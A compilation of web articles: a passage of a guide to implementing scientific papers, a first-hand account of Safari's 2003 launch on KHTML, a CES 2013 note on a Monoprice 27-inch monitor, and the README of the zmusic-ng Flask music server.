If you have never implemented a paper and/or if you are new to the domain of the paper, then the reading can be very difficult. Whatever happens, do not let the amount and the complexity of the mathematical equations discourage you. Moreover, speed is not an issue: even if you feel that you understand the paper slower than you wish you would, just keep on working, and you will see that you will slowly and steadily understand the concepts presented in the paper, and pass all difficulties one after the other.

2 – Three kinds of papers

It is never a good idea to pick a random paper and start implementing it right away. There are a lot of papers out there, which means there is a lot of garbage. All publications fit into three categories:

2.1 – The groundbreaking paper

Some really interesting, well-written, and original research. Most of these papers come out of top-tier universities, or out of research teams in smaller universities that have been tackling the problem for six to ten years. The latter are easy to spot: they reference their own publications in the paper, showing that they have been working on the problem for some time and that they base their new work on a proven record of publications. Also, groundbreaking papers are generally published in the best journals in the field.

2.2 – The copycat paper

Some research group that is just following the work of the groundbreaking teams, proposing improvements to it, and publishing their results of the improvements. Many of these papers lack proper statistical analysis and wrongly conclude that the improvements are really beating the original algorithm. Most of the time, they really are not bringing anything except for unnecessary additional complexity. But not all copycats are bad. Some are good, but it’s rare.

2.3 – The garbage paper

Some researchers really don't know what they are doing and/or are evil. They just try to maintain their status and privileges in the academic institution at which they teach. So they need funding, and for that they need to publish, something, anything. The honest ones will tell you in the conclusion that they failed and that the results are accurate only N% of the time (with N being a bad value). But some evil ones will lie and say that their research was a great success. After some time reading publications, it becomes easy to spot the garbage papers and ditch them.

3 – How to read a scientific paper

A lot has already been written on the topic, so I am not going to write much about it. A good starting point is: How to Read a Paper by Srinivasan Keshav. Below are a few points that I found useful while I was reading scientific publications.

3.1 – Find the right paper

What you want to implement is an original paper, one that started a whole domain. It is sometimes okay to pick a copycat paper, if you feel that it brings real improvements and consistency to a good but immature groundbreaking paper.

So let's say you have a paper as your starting point. You need to do some research in its surroundings. For that, the strategy is to look for related publications, and for the publications listed in the "References" section at the end of the paper. Go on Google Scholar and search for the titles and the authors. Do any of the papers you found do a better job than the paper you had originally? If yes, then just ditch the paper you were looking at in the first place, and keep the new one you found. Another cool feature of Google Scholar is that you can find papers that cite a given paper. This is really great, because all you have to do is follow the chain of citations from one paper to the next, and you will find the most recent papers in the field. Finding the good paper from a starting point is all about looking for papers cited by the current paper, and for papers citing the current paper. By moving back and forth in time you should find the paper that is both of high quality and fits your needs.

Important: note that at this stage of simple exploration and reckoning, you should not be reading and fully understanding the papers. This search for the right paper should be done just by skimming over the papers and using your instinct to detect the garbage (this comes with experience).

3.2 – Do not read on the screen

Print the publication on hard paper and read the paper version. Also, do not reduce the size in order to print more on each page. Yes, you will save three sheets of paper, but you will lose time as you will get tired faster reading these tiny characters. Good font size for reading is between 11 and 13 points.

3.3 – Good timing and location

Do not read a paper in the middle of the night, do it at a moment of the day when your brain is still fresh. Also, find a quiet area, and use good lighting. When I read, I have a desk lamp pointing directly at the document.

3.4 – Marker and notes

Highlight the important information with a marker, and take notes in the margin for whatever ideas pop into your head as you read.

3.5 – Know the definitions of all the terms

When you are used to reading mostly news articles and fiction, your brain is trained to fill in meaning for words that you do not know, using context as a deduction device. Reading scientific publications is a different exercise, and one of the biggest mistakes is to assume a false meaning for a word. For instance, in the sentence "The results of this segmentation approach still suffer from blurring artifacts", the two words "segmentation" and "artifacts" have a general meaning in English, but also have a particular meaning in the domain of Computer Vision. If you do not know that these words have a particular meaning in this paper, then while reading without paying attention, your brain will fill in the general meaning, and you might miss some very important information. Therefore you must (i) avoid assumptions about words, and whenever in doubt look up the word in the context of the domain the publication was written in, and (ii) write a glossary on a piece of paper of all the concepts and vocabulary specific to the publication that you did not know before. If you encounter concepts such as "fiducial points" or "piece-wise affine transform" for the first time, then you should look up their precise definitions and write them down in your glossary. Concepts are language-enabled brain shortcuts that allow you to understand the intent of the authors faster.

3.6 – Look for statistical analysis in the conclusion

If the authors present only one curve from their algorithm and one curve from another algorithm, and say "look, it's 20% more accurate", then you know you're reading garbage. What you want to read is: "Over a testing set of N instances, our algorithm shows significant improvement with a p-value of 5% using a two-sample t-test." The use of statistical analysis shows a minimum of rigor from the authors, and is good evidence that the results can be trusted for generalization (unless the authors lied to make their results look more sexy, which can always happen).
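To illustrate what such a check looks like in practice, here is a minimal sketch of a two-sample t-test in Python with SciPy; the accuracy numbers are made-up placeholders, not results from any paper.

from scipy import stats

# Made-up accuracy scores of two algorithms over the same set of test instances.
accuracy_ours = [0.91, 0.88, 0.93, 0.90, 0.92, 0.89]
accuracy_baseline = [0.85, 0.87, 0.84, 0.86, 0.88, 0.83]

# Two-sample t-test: is the difference in mean accuracy statistically significant?
t_statistic, p_value = stats.ttest_ind(accuracy_ours, accuracy_baseline)
print("t = %.3f, p = %.4f" % (t_statistic, p_value))
# A p-value below 0.05 supports the claim that the improvement is significant.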

3.7 – Make sure the conclusions are demonstrating that the paper is doing what you need

Let's say you want an algorithm that can find any face in a picture. The authors of the paper say in the conclusion that their model was trained using 10 poses from 80 different people (10 x 80 = 800 pictures), and that the accuracy of face detection was 98% on the training set, but only 70% on the testing set (pictures not used during training). What does this mean? It means that, apparently, the algorithm has trouble generalizing properly. It performs well on the training set (which is useless), and performs worse in real-world cases. What you should conclude at this point is that maybe this paper is not good enough for what you need.

3.8 – Pay attention to the input data used by the authors

If you want to perform face detection with a webcam, and the authors have used pictures taken with a high-definition camera, then there are chances that the algorithm will not perform as well in your case as it did for the authors. Make sure that the algorithm was tested on data similar to yours or you will end up with a great implementation that is completely unusable in your real-world setup.

3.9 – Authors are humans

The authors are humans, and therefore they make mistakes. Do not assume that the authors are absolutely right, and in case an equation is really hard to understand or follow, you should ask yourself whether or not the authors made a mistake there. It could be just a typo in the paper, or an error in the maths. In either case, the best way to find out is to work through the equations yourself and try to verify their results.

3.10 – Understand the variables and operators

The main task during the implementation of a publication is the translation of the math equations in the paper into code and data. This means that before jumping into the code, you must understand 100% of the equations and of the processes applied to them. For instance, "C = A . B" could have different meanings. A and B could be simple numbers, and the "." operator could simply be a product; in that case, C would be the product of the two numbers A and B. But maybe A and B are matrices, and "." represents the matrix product operator; in that case, C would be the product matrix of the matrices A and B. Yet another possibility is that A and B are matrices and "." is the term-by-term product operator; in that case, each element C(i,j) is the product of A(i,j) and B(i,j). Notations for variables and operators can change from one mathematical convention to another, and from one research group to another. Make sure you know what each variable is (scalar, vector, matrix or something else), and what every operator does to these variables.
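The ambiguity is easy to see in code. The NumPy sketch below (my own example, not taken from any paper) shows how the same written equation "C = A . B" maps to different operations depending on what A, B and the dot stand for.

import numpy as np

A = np.array([[1.0, 2.0], [3.0, 4.0]])
B = np.array([[5.0, 6.0], [7.0, 8.0]])

C_product = 2.0 * 3.0    # A and B are scalars, "." is an ordinary product
C_matmul = A @ B         # A and B are matrices, "." is the matrix product
C_termwise = A * B       # A and B are matrices, "." is the term-by-term product

print(C_matmul)          # [[19. 22.] [43. 50.]]
print(C_termwise)        # [[ 5. 12.] [21. 32.]]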

3.11 – Understand the data flow

A paper is a succession of equations. Before you start coding, you must know how you will plug the output of equation N into the input of equation N+1.

4 – Prototyping

Once you have read and understood the paper, it’s time to create a prototype. This is a very important step and avoiding it can result in wasted time and resources. Implementing a complex algorithm in languages such as C, C++ or Java can be very time consuming. And even if you have some confidence in the paper and think the algorithm will work, there is still a chance that it won’t work at all. So you want to be able to code it as quickly as possible in the dirtiest way, just to check that it’s actually working.

4.1 – Prototyping solutions

The best solution for that is to use a high-level, versatile language or environment such as Matlab, R, Octave or SciPy/NumPy. It is not that easy to represent a mathematical equation in C++ and then print the results to check them manually. On the contrary, it is extremely straightforward to write equations in Matlab and then print them. What would take you two to three weeks in C++ will take you two days in Matlab.
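As a toy illustration of how cheap this is (my own example, not from the text): an equation like x = (A^T A)^-1 A^T b can be written, run, and inspected in a few lines of NumPy, and cross-checked against a library routine immediately.

import numpy as np

# Toy prototype of the least-squares solution x = (A^T A)^-1 A^T b.
A = np.random.rand(100, 3)
b = np.random.rand(100)

x = np.linalg.inv(A.T @ A) @ A.T @ b
print(x)                                      # inspect the intermediate result directly

# Cross-check against an existing library routine.
print(np.linalg.lstsq(A, b, rcond=None)[0])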

4.2 – Prototyping helps the debugging process

An advantage of having a prototype is that when you will have your C++ version, you will be able to debug by comparing the results between the Matlab prototype and the C++ implementation. This will be developed further in the “Debugging” section below.

4.3 – Wash-off implementation issues beforehand

You will certainly make software design mistakes in your prototype, and this is a good thing, as you will be able to identify where the difficulties lie with both the processes and the data. When you code the C++ version, you will know how to better architect the software, and you will produce way cleaner and more stable code than you would have without the prototyping step (this is the "throw-away system" idea presented by Frederick Brooks in The Mythical Man-Month).

4.4 – Verify the results presented in the paper

Read the “Experiment” section of the paper carefully, and try to reproduce the experimental conditions as closely as possible, by using test data as similar as possible to the ones used by the authors. This increases your chances of reproducing the results obtained by the authors. Not using similar conditions can lead you to a behavior of your implementation that you might consider as an error, whereas you are just not feeding it with the correct data. As soon as you can reproduce the results based on similar data, then you can start testing it on different kinds of data.

5 – Choose the right language and libraries

At this stage, you must have a clear understanding of the algorithm and concepts presented in the publication, and you must have a running prototype which convinces you that the algorithm actually works on the input data you wish to use in production. It is now time to move on to the next step, which consists of implementing the publication with the language and framework that you wish to use in production.

5.1 – Pre-existing systems

Many times, the production language and libraries are dictated by pre-existing systems. For instance, you have a set of algorithms for illumination normalization in a picture, in a library coded in Java, and you want to add a new algorithm from a publication. In that case, obviously, you are not going to code this new algorithm in C++, but in Java.

5.2 – Predicted future uses of the implementation

In the case where there is no pre-existing system imposing a language on you, the choice of the language should be based upon the predicted uses of the algorithm. For example, if you believe that within four to six months a possible port of your application will be made to the iPhone, then you should choose C/C++ over Java, as it would be the only way to easily integrate the code into an Objective-C application without having to start everything from scratch.

5.3 – Available libraries that solve fully or partly the algorithm

The available libraries in different languages can also orient the choice of the production language. Let's imagine that the algorithm you wish to implement makes use of well-known algebra techniques such as principal component analysis (PCA) and singular value decomposition (SVD). You could either code PCA and SVD from scratch, and if there is a bug end up debugging for a week, or you could re-use a library that already implements these techniques and write your implementation using the conventions and matrix class of this library. Ideally, you should be able to decompose your implementation into sub-tasks, and try to find libraries that already implement as many of these sub-tasks as possible. If you find the perfect set of libraries that are only available for a given language, then you should pick that language. Also, note that the choice of libraries should be a trade-off between re-using existing code and minimizing dependencies. Yes, it is good to have code for every sub-task needed by your implementation, but if that requires creating dependencies on 20 different libraries, then it might not be very practical and could even endanger the future stability of your implementation.
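As a small sketch of the reuse argument (my own example, with made-up data): both SVD and a basic PCA are available directly in NumPy, so there is rarely a reason to re-implement them from scratch.

import numpy as np

X = np.random.rand(200, 10)                # 200 samples, 10 features (toy data)

# SVD straight from the library instead of a hand-rolled implementation.
U, singular_values, Vt = np.linalg.svd(X, full_matrices=False)

# A basic PCA built on top of it: center the data, then project onto the top components.
X_centered = X - X.mean(axis=0)
_, _, components = np.linalg.svd(X_centered, full_matrices=False)
X_projected = X_centered @ components[:2].T   # first two principal components
print(X_projected.shape)                      # (200, 2)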

6 – Implementation

Here are some tips from my experience implementing publications.

6.1 – Choose the right precision

The type you will use for your computations should be chosen carefully. It is generally much better to use double instead of float. The memory usage can be larger, but the precision of the calculations will greatly improve, and it is generally worth it. Also, you should be aware of the differences between 32-bit and 64-bit systems. Whenever you can, create your own type to encapsulate the underlying type (float or double, 32-bit or 64-bit), and use this type in your code. This can be done with a typedef or #define in C/C++, or a class in Java.
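In C/C++ this is typically a single typedef (e.g. typedef double real_t;). Below is a minimal sketch of the same idea in Python/NumPy, where the working precision is chosen in one place; the name REAL is my own, not a standard convention.

import numpy as np

# Choose the working precision in exactly one place and use it everywhere.
REAL = np.float64          # switch to np.float32 here if memory becomes the bottleneck

a = np.zeros((1000, 1000), dtype=REAL)
b = np.ones(1000, dtype=REAL)
print(a.dtype, b.dtype)    # both follow the single REAL definition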

6.2 – Document everything

Although it is true that over-documenting can slow down a project dramatically, in the case of the implementation of a complex technical paper, you want to comment everything. Even if you are the only person working on the project, you should document your files, classes and methods. Pick a convention like Doxygen or reStructuredText, and stick to it. Later in the development, there will be a moment where you will forget how some class works, or how you implemented some method, and you will thank yourself for documenting the code!

6.3 – Add references to the paper in your code

For every equation from the paper that you implement, add a comment citing the paper (authors and year) and either the paragraph number or the equation number. That way, when re-reading the code later, you will be able to connect the code directly to precise locations in the paper. These comments should look like:

// See Cootes et al., 2001, Equation 2.3
// See Matthews and Baker, 2004, Section 4.1.2

6.4 – Avoid mathematical notations in your variable names

Let’s say that some quantity in the algorithm is a matrix denoted A. Later, the algorithm requires the gradient of the matrix over the two dimensions, denoted dA = (dA/dx, dA/dy). Then the names of the variables should not be “dA_dx” and “dA_dy”, but “gradient_x” and “gradient_y”. Similarly, if an equation system requires a convergence test, then the variables should not be “prev_dA_dx” and “dA_dx”, but “error_previous” and “error_current”. Always name things for the physical quantity they represent, not whatever letter notation the authors of the paper used (e.g. “gradient_x” and not “dA_dx”), and always express the more specific to the less specific from left to right (e.g. “gradient_x” and not “x_gradient”).

6.5 – Do not optimize during the first pass

Leave all the optimization for later, as you can never be absolutely certain which part of your code will require optimization. Every time you see a possible optimization, add a comment and explain in a couple of lines how the optimization should be implemented, such as:

// OPTIMIZE HERE: computing the matrix one column at a time
// and multiplying them directly could save memory

That way, you can later find all the locations in your code where optimizations are possible, and you get fresh tips on how to optimize. Once your implementation is done, you will be able to find where to optimize by running a profiler such as Valgrind or whatever is available for the programming language you use.

6.6 – Planning on creating an API?

If you plan on using your current code as a basis for an API that will grow with time, then you should be aware of techniques to create interfaces that are actually usable. For this, I would recommend the “coding against the library” technique, summarized by Joshua Bloch in his presentation How to Design a Good API and Why it Matters.

7 – Debugging

Implementing a new algorithm is like cooking a dish you have never eaten before. Even if it tastes kind of good, you will never know whether this is what it was supposed to taste like. Now we are lucky, since unlike cooking, software development has some helpful tricks to increase the confidence we have in an implementation.

7.1 – Compare results with other implementations

A good way to wash out the bugs is to compare the results of your code with the results of an existing implementation of the same algorithm. Assuming you did all the tasks in the “But before you jump” section presented above, you did not find any available implementation of the algorithm (or else you would have used it instead of implementing the paper!). As a consequence, the only other implementation that you have at this stage is the prototype you programmed earlier.

The idea is therefore to compare the results of the prototype and the production implementation at every step of the algorithm. If the results are different, then one of the two implementations is doing something wrong, and you must find out which one and why. Precision can differ slightly (the prototype can give you x = 1.8966 and the production code x = 1.8965), and the comparison should of course take this into account.
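A small helper that checks each intermediate result with a tolerance is usually all that is needed. The sketch below is mine and assumes both implementations can dump their intermediate values as NumPy arrays:

import numpy as np

def compare_step(name, prototype_value, production_value, tolerance=1e-4):
    """Report when the prototype and the production code diverge on one step."""
    prototype_value = np.asarray(prototype_value)
    production_value = np.asarray(production_value)
    if not np.allclose(prototype_value, production_value, atol=tolerance):
        worst = np.max(np.abs(prototype_value - production_value))
        print("Step '%s' differs, max absolute error = %g" % (name, worst))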

7.2 – Talk with people who have read the paper

Once all the steps of both implementations (prototype and production) give exactly the same results, you can gain some confidence that your code is bug-free. However, there is still a risk that you made a mistake in your understanding of the paper. In that case, both implementations will give the same results for each step, and you will think that your implementations are good, whereas this just proves that both implementations are equally wrong. Unfortunately, there is no way that I know of to detect this kind of problem. Your best option is to find someone who has read the paper, and ask that person questions regarding the parts of the algorithm you are not sure about. You could even try asking the authors, but your chances of getting an answer are very low.

7.3 – Visualize your variables

While developing, it is always good to keep an eye on the content of the variables used by the algorithm. I am not talking about merely printing all the values in the matrices and data you have, but finding the visualization trick adapted to each variable in your implementation. For instance, if a matrix is supposed to represent the gradient of an image, then during coding and debugging you should have a window popping up and showing that gradient image, not just the numeric values in the image matrix. That way, you will associate an actual image with the data you are handling, and you will be capable of detecting when there is a problem with one of the variables, which in turn will indicate a possible bug. Inventive visualization tricks include images, scatter plots, graphs, or anything that is not just a stupid list of 1,000 numbers and upon which you can build a mental image.
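As an example, assuming the prototype is written in Python, a tiny matplotlib helper is enough to turn any image-like matrix into something you can actually look at; this helper is a sketch of mine, not part of any particular project:

import matplotlib.pyplot as plt

def show_matrix(matrix, title=""):
    """Display a matrix as an image instead of printing its raw values."""
    plt.imshow(matrix, cmap="gray")
    plt.title(title)
    plt.colorbar()
    plt.show()

# e.g. show_matrix(gradient_x, "gradient along x")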

7.4 – Testing dataset

Generating data to experiment with your implementation can be very time consuming. Whenever you can, try to find existing databases (face databases, text extract databases, etc.) or tools for generating such data. If there are none, then do not waste time generating 1,000 samples manually: code a quick data generator in 20 lines and be done with it.
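A throwaway generator along these lines is usually enough; everything in the sketch below (file name, fields, ranges, labels) is made up for the sake of the example:

import csv
import random

def generate_samples(path, count=1000):
    """Write 'count' random labeled 2-D points to a CSV file for quick testing."""
    with open(path, "w", newline="") as output:
        writer = csv.writer(output)
        writer.writerow(["x", "y", "label"])
        for _ in range(count):
            x, y = random.uniform(0, 1), random.uniform(0, 1)
            writer.writerow([x, y, 1 if x + y > 1 else 0])

generate_samples("test_samples.csv")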

Conclusion

In this article, I have presented good practices for implementing a scientific publication. Remember that these are based only on my personal experience, and that they should not be blindly followed word for word. Always pay attention when you read and code, and use your judgement to determine which of the guidelines presented above fit your project. Maybe some of the practices will hurt your project more than they will help it, and that’s up to you to find out.

Now go implement some cool algorithm!

References

How to Read a Paper by Srinivasan Keshav
How to Design a Good API and Why it Matters by Joshua Bloch
The Mythical Man-Month by Frederick Brooks
The 20 / 80 Productivity Rule by Emmanuel Goossaert
Google Scholar



Safari is released to the world


Comments:"Safari is released to the world"

URL:http://donmelton.com/2013/01/10/safari-is-released-to-the-world/


During the early development of Safari, I didn’t just worry about leaking our secret project through Apple’s IP address or our browser’s user agent string. It also concerned me that curious gawkers on the outside would notice who I was hiring at Apple.

Other than a bit part in a documentary about Netscape that aired on PBS, I wasn’t known to anyone but a few dozen other geeks in The Valley. Of course, several of those folks were aware I was now at Apple and working on some project I wouldn’t say anything about. And it doesn’t take many people in this town to snowball a bit of idle speculation.

I found out later that Andy Hertzfeld, an Apple veteran who I worked with at Eazel, had figured it all out by the time I showed up for my first day to work on the browser on June 25, 2001. Andy was very insightful that way. But thankfully he was also quiet about it at the time.

Hiring Darin Adler, also ex-Apple and ex-Eazel, in the Spring of 2002 was likely visible to others in the industry since he was much more well known than me. But because Darin had never worked on a dedicated Web browser like I had, no one made the connection.

However, when I hired Dave Hyatt in July 2002, then guesses started flying fast.

While at Netscape, Dave built the Chimera (now known as Camino) browser for Mac OS X and co-created the project that would later become Firefox. Both of these applications were based on the Mozilla Gecko layout engine on which Dave also worked. He was a true celebrity in the Web browser world, having his hands in just about every Mozilla project.

So, during the Summer of 2002, several bloggers and tech websites speculated that Dave must be bringing Chimera to the Mac. Except that Chimera was already a Mac application and didn’t need to be ported. So what the hell was Dave doing at Apple? Building another Gecko-based Mac browser? No one knew. And none of this made much sense. Which is probably why the rumors subsided so quickly.

But people would remember all of this when Safari debuted at Macworld in San Francisco on January 7, 2003. And at least one of them would remember it at full volume while Steve Jobs was on stage making that announcement.

Until I watched that video I found and posted of the Macworld keynote, I had completely forgotten what else was announced that day. Which is pretty sad considering I saw Steve rehearse the whole thing at least four times.

But you have to realize I was totally focused on Safari. And Scott Forstall, my boss, wanted me at those rehearsals in case something went wrong with it.

There’s nothing that can fill your underwear faster than seeing your product fail during a Steve Jobs demo.

One of my concerns at the time was network reliability. So, I brought Ken Kocienda, the first Safari engineer, with me to troubleshoot since he wrote so much of our networking code. If necessary, Ken could also diagnose and duct tape any other part of Safari too. He coined one of our team aphorisms, “If it doesn’t fit, you’re not shoving hard enough.”

Ken and I started at Apple on the same day so, technically, he’s the only original Safari team member I didn’t hire. But because we both worked at Eazel together, I knew that Ken was a world-class propellor-head and insisted Forstall assign him to my team — essentially a requirement for me taking the job.

Most of the time during those rehearsals, Ken and I had nothing to do except sit in the then empty audience and watch The Master Presenter at work — crafting his keynote. What a privilege to be a spectator during that process. At Apple, we were actually all students, not just spectators. When I see other companies clumsily announce products these days, I realize again how much the rest of the world lost now that Steve is gone.

At one rehearsal, Safari hung during Steve’s demo — unable to load any content. Before my pants could load any of its own, Ken discovered the entire network connection had failed. Nothing we could do. The IT folks fixed the problem quickly and set up a redundant system. But I still worried that it might happen again when it really mattered.

On the day of the actual keynote, only a few of us from the Safari team were in the audience. Employee passes are always limited at these events for obvious reasons. But we did have great seats, just a few rows from the front — you didn’t want to be too close in case something really went wrong.

Steve started the Safari presentation with, “So, buckle up.” And that’s what I wished I could do then — seatbelt myself down. Then he defined one of our product goals as, “Speed. Speed.” So, I tensed up. Not that I didn’t agree, of course. I just knew what was coming soon:

Demo time.

And for the entire six minutes and 32 seconds that Steve used Safari on stage, I don’t remember taking a single breath. I was thinking about that network failure during rehearsal and screaming inside my head, “Stay online, stay online!” We only had one chance to make a first impression.

Of course, Steve, Safari and the network performed flawlessly. I shouldn’t have worried.

Then it was back to slides and Steve talking about how we built it. “We based Safari on an HTML rendering engine that is open source.” And right then is when everybody else remembered all those rumors from the Summer about Dave Hyatt bringing Chimera to Apple.

But I chose the engine we used — with my team’s and my management chain’s support, of course — a year before Dave joined the project. Dave thought it was a great decision too, once he arrived. But that engine wasn’t Gecko, the code inside Chimera.

It was KHTML. Specifically KHTML and KJS — the code inside KDE’s Konqueror Web browser on Linux. After the keynote was over, I sent this email to the KDE team to thank them and introduce ourselves. I did it right from where I was sitting too, once they turned the WiFi back on.

You can argue whether KHTML was the right decision — go ahead, after 10 years it doesn’t faze me anymore. I’ll detail my reasons in a later post. Spoiler alert: I don’t hate Gecko.

But back to Steve’s presentation.

Everyone was clapping that Apple embraced open source. Happy, happy, happy. And they were just certain what was coming next. Then Steve moved a new slide onto the screen. With only one word, “KHTML” — six-foot-high white letters on a blue background.

If you listen to that video I posted, notice that no one applauds here. Why? I’m guessing confusion and complete lack of recognition.

What you also can’t hear on the video is someone about 15 to 20 rows behind where we were sitting — obviously expecting the word “Gecko” up there — shout at what seemed like the top of his lungs:

“WHAT THE FUCK!?”

KHTML may have been a bigger surprise than Apple doing a browser at all. And that moment was glorious. We had punk’d the entire crowd.

CES 2013: Monoprice Announces 27-Inch 2560x1440 Monitor for $390 - Tested


Comments:"CES 2013: Monoprice Announces 27-Inch 2560x1440 Monitor for $390 - Tested"

URL:http://www.tested.com/tech/pcs/452766-monoprice-announces-27-inch-2560x1440-monitor-390/


The Samsungs, Sharps and Sonys of CES love to show off the best cutting-edge technology they have to offer. And cutting-edge technology is invariably expensive. 4K TVs ruled the show this year, but you won't see one in a store in 2013 for less than $12,000. Then there are vendors like Monoprice, who show up to CES with products that are A) Affordable and B) Worth using now, not five years in the future. The Internet's favorite source for cheap audio/video cables announced a new 27-inch monitor at CES that will compete with those increasingly popular Korean imports like the Yamakasi Catleap.

We've covered budget Korean monitors in-depth before--basically, some smart eBay shopping can net you a 27-inch 2560x1440 IPS monitor (with the same LG panels that Apple puts into its monitors) for $300 or $400. They're barebones, but the screens are beautiful. A few US retailers like Micro Center have started offering their own alternatives at similar bargain prices. Monoprice's new Crystal Pro comes in at $390.

Why buy from Monoprice instead of importing from Korea? It's all about the warranty. Monoprice offers a five dead pixel return policy, which isn't bad, and the monitor comes with a general three year warranty. If one of the Korean monitors breaks down, you're basically out of luck. Monoprice is a bit easier to reach.

The $390 monitor is back-ordered at Monoprice but should ship on March 2nd.

zmusic-ng - ZX2C4 Music web application that serves and transcodes tagged music libraries using Flask and Backbone.js.


Comments:"zmusic-ng - ZX2C4 Music web application that serves and transcodes tagged music libraries using Flask and Backbone.js."

URL:http://git.zx2c4.com/zmusic-ng/about/


ZX2C4 Music provides a web interface for playing and downloading music files using metadata.

Features

  • HTML5 <audio> support.
  • Transcodes unsupported formats on the fly.
  • Serves zip files of chosen songs on the fly.
  • Supports multiple formats: mp3, aac, ogg, webm, flac, musepack, wav, wma, and more.
  • Clean minimalistic design.
  • Handles very large directory trees.
  • Full metadata extraction.
  • Advanced search queries.
  • Statistics logging.
  • Simple RESTful JSON API design.
  • Integration with nginx's X-Accel-Redirect.
  • Supports multiple different database backends.
  • Can run stand-alone or with uwsgi/nginx.

Dependencies

Frontend

All frontend dependencies are included in the source.

Backend

All backend dependencies must be present on system.

Downloading

The source may be downloaded using git:

$ git clone http://git.zx2c4.com/zmusic-ng/

Building

The entire project is built using standard makefiles:

zmusic-ng $ make

The makefiles have the usual targets, such as clean and all, and some others discussed below. If the environment variable DEBUG is set to 1, js and css files are not minified.

Want to run the app immediately? Skip down to Running Standalone.

URLs and APIs

Frontend

GET /

The frontend interface supports query strings for controlling the initial state of the application. These query strings will be replaced with proper HTML5 pushState in the near future. Accepted query string keys:

  • username and password: Automatically log in using provided credentials.
  • query: Initial search query. If unset, chooses a search at random from predefined (see below) list.
  • play: Integer (1-indexed) specifying which song in the list to autoplay. No song autoplays if not set.

Backend

The provided frontend uses the following API calls. Third parties might implement their own applications using this simple API. All API endpoints return JSON unless otherwise specified.

GET /query/<search query>

Queries server for music metadata. Each word is matched as a substring against the artist, album, and title of each song. Prefixes of artist:, album:, and title: can be used to match exact strings against the respective keys. * can be used as a wildcard when matches are exact. Posix shell-style quoting and escaping is honored. Example searches:

  • charles ming
  • changes mingus
  • artist:"Charles Mingus"
  • artist:charles*
  • artist:charles* album:"Changes Two"
  • goodbye pork artist:"Charles Mingus"

Requires logged in user. The query strings offset and limit may be used to limit the number of returned entries.

GET /song/<id>.<ext>

Returns the data in the music file specified by <id> in the format given by <ext>. <ext> may be the original format of the file, or mp3, ogg, webm, or wav. If a format is requested that is not the song's original, the server will transcode it. Use of original formats is thus preferred, to cut down on server load and to enable seeking using HTTP Content-Range.

Requires logged in user. The server will add the X-Content-Duration HTTP header containing the duration in seconds as a floating point number.

POST /login

Takes form parameters username and password. Returns whether or not login was successful.

GET /login

Returns whether or not user is currently logged in.

GET /logout

Logs user out. This request lacks proper CSRF protection. Requires logged in user.

GET /scan

Scans the library for new songs and extracts metadata. This request lacks proper CSRF protection. Requires logged in admin user.

GET /stats

Returns IP addresses and host names of all downloaders in time-order. Requires logged in admin user.

GET /stats/<ip>

Returns all downloads and song-plays from a given <ip> address in time-order. Requires logged in admin user.

Authentication

All end points that require a logged in user may use the cookie set by /login. Alternatively, the query strings username and password may be sent for a one-off authentication.
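As a rough illustration (not part of the original documentation), a third-party client written in Python with the requests library might use the API like this; the host, credentials, and search query below are placeholders, and the exact shape of the returned JSON is not shown here:

import requests
from urllib.parse import quote

base = "http://127.0.0.1:5000"  # placeholder host
session = requests.Session()

# Log in once; the session cookie authenticates the following requests.
session.post(base + "/login", data={"username": "user", "password": "secret"})

# Run a metadata query, limited to the first 10 matches.
query = quote('artist:"Charles Mingus"')
print(session.get(base + "/query/" + query, params={"limit": 10}).json())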

Configuration

Frontend

The frontend should be relatively straightforward to customize. Change the title of the project in frontend/index.html, and change the default randomly selected search queries in frontend/js/app.js. A more comprehensive configuration system might be implemented at some point, but these two tweaks are easy enough that for now it will suffice.

Backend

The backend is configured by modifying the entries in backend/app.cfg. Valid configuration options are:

  • SQLAlchemy keys: The keys listed on the Flask-SQLAlchemy configuration page, with SQLALCHEMY_DATABASE_URI being of particular note.
  • Flask keys: The keys listed on the Flask configuration page. Be sure to change SECRET_KEY and set DEBUG to False for deployment.
  • STATIC_PATH: The relative path of the frontend directory from the backend directory. The way this package is shipped, the default value of ../frontend is best.
  • MUSIC_PATH: The path of a directory tree containing music files you'd like to be served.
  • ACCEL_STATIC_PREFIX: By default False, but if set to a path, this path is used as a prefix for fetching static files via nginx's X-Accel-Redirect. nginx must be configured correctly for this to work.
  • ACCEL_MUSIC_PREFIX: By default False, but if set to a path, this path is used as a prefix for fetching music files via nginx's X-Accel-Redirect. nginx must be configured correctly for this to work.
  • MUSIC_USER and MUSIC_PASSWORD: The username and password of the user allowed to listen to music.
  • ADMIN_USER and ADMIN_PASSWORD: The username and password of the user allowed to scan MUSIC_PATH for new music and view logs and statistics.

Deployment

Running Standalone

By far the easiest way to run the application is standalone. Simply execute backend/local_server.py to start a local instance using the built-in Werkzeug server. This server is not meant for production. Be sure to configure the usernames and music directory first.

zmusic-ng $ backend/local_server.py
* Running on http://127.0.0.1:5000/
* Restarting with reloader

The collection may be scanned using the admin credentials:

zmusic-ng $ curl "http://127.0.0.1:5000/scan?username=ADMIN_USER&password=ADMIN_PASSWORD"

And then the site may be viewed in the browser:

zmusic-ng $ chromium http://127.0.0.1:5000/

The built-in debugging server cannot handle concurrent requests, unfortunately. To more robustly serve standalone, read on to running standalone with uwsgi.

Running Standalone with uwsgi

The built-in Werkzeug server is really only for debugging, and cannot handle more than one request at a time. This means that, for example, one cannot listen to music and query for music at the same time. Fortunately, it is easy to use uwsgi without the more complicated nginx setup (described below) in a standalone mode:

zmusic-ng $ uwsgi --chdir backend/ -w zmusic:app --http-socket 0.0.0.0:5000

Depending on your distro, you may need to add --plugins python27 or similar.

Once the standalone server is running you can scan and browse using the URLs above.

Uploading Music

There is an additional makefile target called update-collection for uploading a local directory to a remote directory using rsync and running the metadata scanner using curl. Of course, uploading is not necessary if running locally.

zmusic-ng $ make update-collection

The server.cfg configuration file controls the relevant paths for this command:

  • SERVER: The hostname of the remote server.
  • LOCAL_COLLECTION_PATH: The path of the music folder on the local system.
  • SERVER_COLLECTION_PATH: The destination path of the music folder on the remote system.
  • ADMIN_USERNAME and ADMIN_PASSWORD should be the same as those set in backend/app.cfg.

nginx / uwsgi

Deployment to nginx requires use of uwsgi. A sample configuration file can be found in backend/nginx.conf. Make note of the paths used for the /static/ and /music/ directories. These should be absolute paths to those specified in backend/app.cfg as STATIC_PATH and MUSIC_PATH.

uwsgi should be run with the -w zmusic:app switch, possibly using --chdir to change directory to the backend/ directory, if not already there.

For easy deployment, the makefile has some deployment targets, which are configured by the server.cfg configuration file. These keys should be set:

  • SERVER: The hostname of the deployed server.
  • SERVER_UPLOAD_PATH: A remote path where the default ssh user can write.
  • SERVER_DEPLOY_PATH: A remote path where the default ssh user cannot write, but where root can.

